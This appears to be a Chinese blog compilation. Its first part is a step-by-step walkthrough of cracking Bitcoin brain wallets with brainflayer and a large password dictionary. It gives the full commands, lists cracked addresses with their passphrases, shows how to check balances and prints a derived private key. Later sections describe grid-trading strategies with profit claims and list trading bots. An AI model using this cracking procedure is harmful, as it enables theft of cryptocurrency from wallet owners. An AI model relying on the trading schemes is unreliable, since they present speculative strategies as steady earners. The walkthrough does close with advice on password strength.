脑钱包破解工具实测

引言:
白帽黑客发布比特币脑钱包掠夺者,每秒可猜测13万个密码
http://www.8btc.com/new-cracking-tool

下面是基于上面这则新闻进行的脑钱包密码破解的实战测试。

先给出脑钱包暴力破解代码 brainflayer 下载地址: https://github.com/ryancdotorg/brainflayer

1. 暴力破解脑钱包,首先要有个强大的字典文件。
本测试使用CrackStation的密码字典,本字典文件为15G,包含了差不多15亿个密码。下载地址: https://crackstation.net/buy-crackstation-wordlist-password-cracking-dictionary.htm

2. 安装好比特币服务 https://github.com/bitcoin/bitcoin
如果不知道怎么装,那下面的内容就别试了,看着玩吧。

3. 利用开源的区块链工具 Blockparser 获取所有的比特币地址。
Blockparser 下载地址: https://github.com/znort987/blockparser
运行Blockparser 获取目前所有的比特币地址

./parser allBalances > allBalances.txt

这是一个相当耗内存的操作,建议64G的内存。
由于 allBalances.txt 文件中包含了金额等其他信息,需要用 awk 命令行整理下 allBalances.txt 的内容,我们只需要比特币地址信息。

awk '{ print $2 }' allBalances.txt > btcaddress.hex

4. Brainflayer 破解程序要求输入的比特币地址格式为 Hash160,所以需要把上面获取的所有比特币地址转换为 Hash160 格式。
类似的工具很多,我用的是下面这个 Perl 代码: http://lenschulwitz.com/base58
稍加修改就能转换整个文件了。(后面的评论里有代码)

5. 用Brainflayer 文件包中的工具 hex2blf 把 Hash160 地址转换为布隆过滤文件。
Brainflayer 利用这个布隆过滤器,大大提高了密码破解速度。

hex2blf btcaddress.hex btcaddress.blf

6. 开始破解!

brainflayer -b btcaddress.blf -i password.txt

我还真没想到刚开始运行就输出了几十个破解结果,虽然全部运行完这15G的密码文件需要好几个小时,但是破解效率还是真不错。用CrackStation的密码字典查出了将近2万个比特币地址和相应的脑钱包密码!

7. 来分析下这些被破解的密码: (第一栏是比特币地址Hash160格式,最后一栏是密码)

简单的就不多说了。

6e24b1342852a8e4af3c63206f8b2266ba887ef6:u:str:1234
ec42ad7fd54f931274b83f6137379206e458b106:u:str:1satoshi

那些很长的数字密码都能被破解:

09b508bae503da42f05575891866d0072bcf65f6:u:str:011235813213455
32f6ace81715e0872e6db7ff4a280185205620a3:u:str:12345678901234567890
afe66e0314eb15a5cd01d95b94166ce995c3347d:u:str:000000000000000000000000000000

字母密码看起来15位以内的都没用,破解了太多了。

482bc0946efa74a5a3d005e693b2774e1aeb7dad:u:str:qwertyuiopasdfghjklzxcvbnm
4b1b231e9caa7f95d51ed7c99df68a5add5a1714:u:str:doandroidsdreamofelectricsheep
bf1f119153f6ecedb259f0043f9fbbc88687b22e:u:str:thepastisagrotesqueanimal

再看看有些很长的密码都能破解,有点心惊。

ac8dc3fcfa4e9e91dddfc0c3fe6d7e0021292036:u:str:may the force be with you
8b0a993126c3bf8f4b28c8264b553d6aa39f2956:u:str:Money is the root of all evil.
1622dc9d9e5423d7b84122f9ef7edfa1981d9960:u:str:nothing ventured nothing gained
0c7cdc2d447af8d422dd2b54cab2f274ca88131d:u:str:No one can make you feel inferior without your consent.
8ee2d47121c480c37f9dd0a88bddf2dc21b284da:u:str:The quick brown fox jumped over the lazy dog.
2029758fa9d81f9c36f4be2ab8696ad10fc602f8:u:str:The quick brown fox jumps over the lazy dog
838edc90c250d298fc115bf028164f105e228fb9:u:str:these aren't the droids you're looking for
8c4cfbd55dd01f6c221372eba1e57c7496d7239f:u:str:This is the way the world ends.
31ae15fc484cf5fd34ecd49e1afb51e3f2174a93:u:str:tomb-of-the-unknown-soldier-identification-badge

还有中文名做密码的

7afa3b687e58d3f16feccb8244b90a87a535b85c:u:str:试试看
73b1bebd338fc051dba7282d4f99846fac01df23:u:str:中国上海

8. Brainflayer 输出的地址是 Hash160格式,还是用上面第4步里的工具,转换回普通的比特币地址。
例如: ec42ad7fd54f931274b83f6137379206e458b106:u:str:1satoshi
转换为比特币地址是: 1NYEM85RpgkSofLqDfwjb21o3MD4ibSo49
脑钱包密码是 1satoshi

9. 你们是不是很关心这些地址里还有没有币?
Blockchain.info 上可以查询余额。
也可以通过API查询

https://blockchain.info/q/addressbalance/1NYEM85RpgkSofLqDfwjb21o3MD4ibSo49

我查了好多破解的地址,余额全部为0,应该是这些简单的字典破解的账号,早被人把余额转走了。

10. 最后就是,如果真的某个地址里有余额,那么对应的秘钥是什么?
开源代码 Addressgen 提供了根据脑钱包密码生成比特币地址和秘钥的功能。

https://github.com/sarchar/addressgen

以上面的 ec42ad7fd54f931274b83f6137379206e458b106:u:str:1satoshi 为例,第8步给出了比特币地址是:
1NYEM85RpgkSofLqDfwjb21o3MD4ibSo49,下面通过 Addressgen 来验证。

运行

./genaddress.py -p 1satoshi

输出如下:

ECDSA private key (random number / secret exponent)
51b2156ca4b9d96c9e77938b1197b806a4a2822060da15d79f2f6f8f75655644
Bitcoin private key (Base58Check, uncompressed)
5JSGPQ2Jw1P5cVi2L8LeuWnMF5H8rLGrPPgVM2XE1cahG1BQDzY
Bitcoin extended private key (Base58Check)
xprv9s21ZrQH143K3TEjPXq1CkrNDMfYWYwVNKVWqSPeEthWqd4uJKWSRnM2GX2BYktMDQrGxa2FZrpDdt5Q1qeLk4T46974eh9Eo7iHCfGcY37
(embedded private key) -> L43jHnozmKE5TYNqMwsPgXNcTfRT7TNhzDkTgaKAgYcx99Qm5LhB
------
ECDSA public key (uncompressed)
04a3599acf74fc7b781207860e8753f182fc4b8c5febe6c5f2e09381893abb4e0b290a172aa6a7ba13c5a32de6d10a024d95cf786d72e650889a4a22f29a3b84df
Bitcoin Address (uncompressed, length=34):
1NYEM85RpgkSofLqDfwjb21o3MD4ibSo49
Bitcoin extended public key
xpub661MyMwAqRbcFwKCVZN1Zto6mPW2v1fLjYR7dpoFoEEViRQ3qrpgyafW7nhb8fPtRaX2TJbCXQAfgAhMYGJ9DJeF1UVAMYu3Ucd3BqaeU9R
(embedded public key) -> 032131be64ba3f27e757c2f0f310038a8dfb768ff922448aff2841fa7954472880
(bitcoin address) -> 1Kvdg9jcdcdWGBb77Rovd8jkHjPd4eKB6t

从上面可以看到,比特币地址正是 1NYEM85RpgkSofLqDfwjb21o3MD4ibSo49
而对应的秘钥为 5JSGPQ2Jw1P5cVi2L8LeuWnMF5H8rLGrPPgVM2XE1cahG1BQDzY

总结:
使用脑钱包的密码一定要非常强大,即使是好多个单词都不一定安全。这个测试只用了一台主机几个小时的运算时间,就检验了15亿的密码组合。
如果租个几十台云主机破解一个月,破解的密码组合可以到十万亿以上。大家可以算算自己的密码强度够不够!

比特币高频交易的实战简易版

将比特币高频交易简单化,以下的模式可以一战。

假设价格中轴线为2250元,有5个比特币和11250元资金,可以采取以下方式进行。

先下10个主单,成交后在10元的差价出挂出副单,副单成交后再挂出主单,循环进行:

1、先在2390埋一个卖单,成交后马上在2380埋一个买单,成交后再在2390埋一个卖单,依次循环。
2、先在2340埋一个卖单,成交后马上在2330埋一个买单,成交后再在2340埋一个卖单,依次循环。
3、先在2300埋一个卖单,成交后马上在2290埋一个买单,成交后再在2300埋一个卖单,依次循环。
4、先在2270埋一个卖单,成交后马上在2260埋一个买单,成交后再在2270埋一个卖单,依次循环。
5、先在2250埋一个卖单,成交后马上在2240埋一个买单,成交后再在2250埋一个卖单,依次循环。

6、先在2245埋一个买单,成交后马上在2255埋一个卖单,成交后再在2245埋一个买单,依次循环。
7、先在2225埋一个买单,成交后马上在2235埋一个卖单,成交后再在2225埋一个买单,依次循环。
8、先在2195埋一个买单,成交后马上在2205埋一个卖单,成交后再在2195埋一个买单,依次循环。
9、先在2155埋一个买单,成交后马上在2165埋一个卖单,成交后再在2155埋一个买单,依次循环。
10、先在2105埋一个买单,成交后马上在2115埋一个卖单,成交后再在2105埋一个买单,依次循环。

关于价格中轴线,手工确定,当然也可以用价格最近拨动的中间线来确定,最好是成交比较密集的区域。
关于差价,10元或其他都可以。
关于每次交易的数量,根据自己的资金实力来决定,1个比特币或者0.1个比特币都可以。
关于主单数,方案是10个,也可以是更多。
关于主单的报价差距,方案是依次差距20元、30元、40元、50元。也可以自行调整,最好是前后单略微交叉,这样成交更密。

比特币高频交易适用于牛皮行情,双向拨动频繁,但价格变化不大。对于单边上涨或下跌行情,最好慎重停用。

投资有风险,操作需谨慎。

本文来自: http://www.lxway.com/568104026.htm

比特币高频交易的策略分析

许多比特币的交易平台实行零交易费,并提供交易的API接口,为实现比特币的高频交易提供了有利条件。

如何进行比特币高频交易?下面提出一个简单的交易模型。

1、根据自己的资金实力,决定每次交易的最小单位,下面以一个比特币为交易单位,所以至少要有十个比特币的交易款。

2、每5分钟决定交易一次,决定是:不交易、买入一个、卖出一个。

3、统计5分钟的买卖盘,足够买卖一个比特币的最低卖出价和最高买入价。

4、首次交易时假设已经有五个比特币,和当前市价足够买五个以上的资金。

5、第一个5分钟后,必然发生一笔按市价执行的交易,事前设定买入或卖出一个比特币,同时反方向下一个挂单:卖出或买入一个比特币,价格是5每钟内的最高买入价或最低卖出价。同时记录这两笔交易的价格差,价格最少也要相差10元。

6、如果行情上下窄幅跳动,则买卖交替进行,中间就会产生利润。

7、如果出现单边市,如何执行买卖呢?比如以2000元卖出一个比特币,同时在1990挂一个买入单,这时价格继续上升,短时间内不会回落到1990元,该怎么办呢?

8、当上升到原来的价格差的两倍20元时,继续卖出一个比特币,即在2020元卖出一个比特币,在原来的价差一倍的地方下一个买单:2005买入一个。这时在2005、1990处有两个买单。

9、如果行情继续上涨,导致挂的两个买单没有成交,而价格升到上一个价差20元的两倍40元时,即在2060元再卖出一个比特币,同时在2025元再挂买单。

10、只有价格回落,每成交一个买单,就可以在买入价上方10元出卖出,每次来回买卖一次赚10元,每次交易净赚0.5%。

11、单边下跌也是,越是下跌,买单的差距就越大,可以通过一个列表来找出买卖价。

上升段:
2140卖,2110买
2090卖,2065买
2050卖,2030买
2020卖,2005买
2000卖,1990买·

下降段:
1990买,2000卖
1970买,1985卖
1940买,1960卖
1900买,1925卖
1850买,1880卖

前面的是主单,后面是幅单。主单可以先挂出去,必须在其成交后再挂副单。只有副单成交,对应的主单再挂出去。

如果结合布林通道计算,在上下轨扩大时执行上述的策略,在上下轨合拢后,重新确定新的中间价格线,如例子中的2000元。

不断循环操作,达到最大获利目的。

本文来源: http://www.lxway.com/568104462.htm

比特币自动交易代码和套利机器人 (开源软件)

简单介绍几个比特币/山寨币的自动交易系统,利用开源代码自己可以再定制好的交易策略,有兴趣的朋友一起来探讨。

如果您知道其它好的开源自动交易系统,欢迎添加。

软件名称: Blackbird
编程语言: C++
下载地址: https://github.com/butor/blackbird
支持平台: Bitfinex, OKCoin, Bitstamp, Kraken, ItBit, Gemini
软件简介: 比特币多交易平台间套利系统。利用平台间价格变化盈利,无需在平台之间转账。

软件名称: Gekko
编程语言: Javascript / nodejs
下载地址: https://github.com/askmike/gekko
支持平台: Bitstamp, CEX.io, Kraken, BTC-e, Bitfinex, LakeBTC, Cryptsy
软件简介: 比特币交易机器人,可以依据单个DEMA, MACD, RSI 或者 PPO 指标操作,参数可定制,可以自己添加交易算法,Gekko 还可通过插件增加资讯、邮件、盈利模拟等功能。

软件名称: Bitcoin Arbitrage
编程语言: Python
下载地址: https://github.com/maxme/bitcoin-arbitrage
交易平台: Bitstamp
软件简介: 比特币套利机器人,支持以下比特币行情查询: Bitstamp (USD), Paymium (EUR), BTC-e (USD, EUR), Bitfinex (USD), Kraken (USD, EUR), OkCoin (CNY), CampBX (USD), Gemini (USD), BTCC (CNY), Coinbase (USD)

软件名称: Bitcoin Dealer
编程语言: Django
下载地址: https://github.com/rokj/bitcoin_dealer
支持平台: Bitstamp
软件简介: 一个简单的比特币自动交易机器人,仅支持 Bitstamp,有网页管理界面。

软件名称: BTC-E Arbitrage Bot
编程语言: PHP
下载地址: https://bitcointalk.org/index.php?topic=236321.0
支持平台: BTC-e
软件简介: BTC-e 平台套利机器人,利用btc-e上不同币种之间的实时差价实现盈利。代码简单,如果熟悉PHP,自己可以修改套利方向及交易算法。

软件名称: Crypto Arbitrage Trader
编程语言: Python
下载地址: https://github.com/PeanutPower/CryptoArbitrageTrader
支持平台: Coins-E, BTC-e, Vircurex, Cryptsy
软件简介: 比较各平台上的山寨币价格并自动套利交易。

软件名称: tAPIbot
编程语言: Python
下载地址: https://github.com/nomorecoin/tAPIbot
支持平台: BTC-e
软件简介: 基于 BTC-E 平台的自动交易系统,有些时间没有更新了。交易算法简单,各项配置参数在文件 settings.ini 中。

网页版比特币套利和交易机器人

介绍几个比特币套利和交易机器人的网站,欢迎探讨交易策略

名称: TradeWave
网站: https://tradewave.net
交易平台: BTC-e, Bitfinex, Kraken, Bitstamp, Coinsetter, OKCoin, Coinbase

名称: CryptoTrader
网站: https://cryptotrader.org/
交易平台: Bitstamp, Coinbase, Huobi, OKCoin, BTC-e, CEX.IO, Bitfinex, Kraken, Cryptsy

名称: Haasbot
网站: https://www.haasonline.com/
交易平台: (目前未开放注册)